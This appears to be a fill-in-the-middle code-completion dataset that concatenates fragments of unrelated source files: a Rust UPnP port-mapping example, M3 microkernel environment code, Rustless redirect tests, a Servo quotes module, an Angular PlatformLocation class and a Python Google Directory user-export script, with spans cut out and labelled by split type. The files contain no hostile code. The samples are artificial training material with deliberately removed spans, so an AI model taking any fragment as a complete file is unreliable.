.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
}
| main | identifier_name |
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP | //! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn main() {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
} | random_line_split |
|
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
} | pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
}
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn set_next_sel(&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
} | random_line_split |
|
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
}
pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
}
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn | (&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
}
| set_next_sel | identifier_name |
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
}
pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) |
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn set_next_sel(&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
}
| {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
} | identifier_body |
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn | () {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | it_allows_redirect | identifier_name |
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn it_allows_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() | {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | identifier_body |
|
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn it_allows_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| { | });
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
}) | random_line_split |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
| lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn get_initial_value() -> Quotes {
Quotes(INITIAL_QUOTES.clone())
}
} | use servo_arc::Arc;
| random_line_split |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
use servo_arc::Arc;
lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn get_initial_value() -> Quotes |
}
| {
Quotes(INITIAL_QUOTES.clone())
} | identifier_body |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
use servo_arc::Arc;
lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn | () -> Quotes {
Quotes(INITIAL_QUOTES.clone())
}
}
| get_initial_value | identifier_name |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use | *
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get hash() { return null; }
} | * {@link Location}. | random_line_split |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use
* {@link Location}.
*
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get | () { return null; }
}
| hash | identifier_name |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use
* {@link Location}.
*
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get hash() |
}
| { return null; } | identifier_body |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
|
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close() | identifier_body |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId) | primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
''' |
'''
for user in page: | random_line_split |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
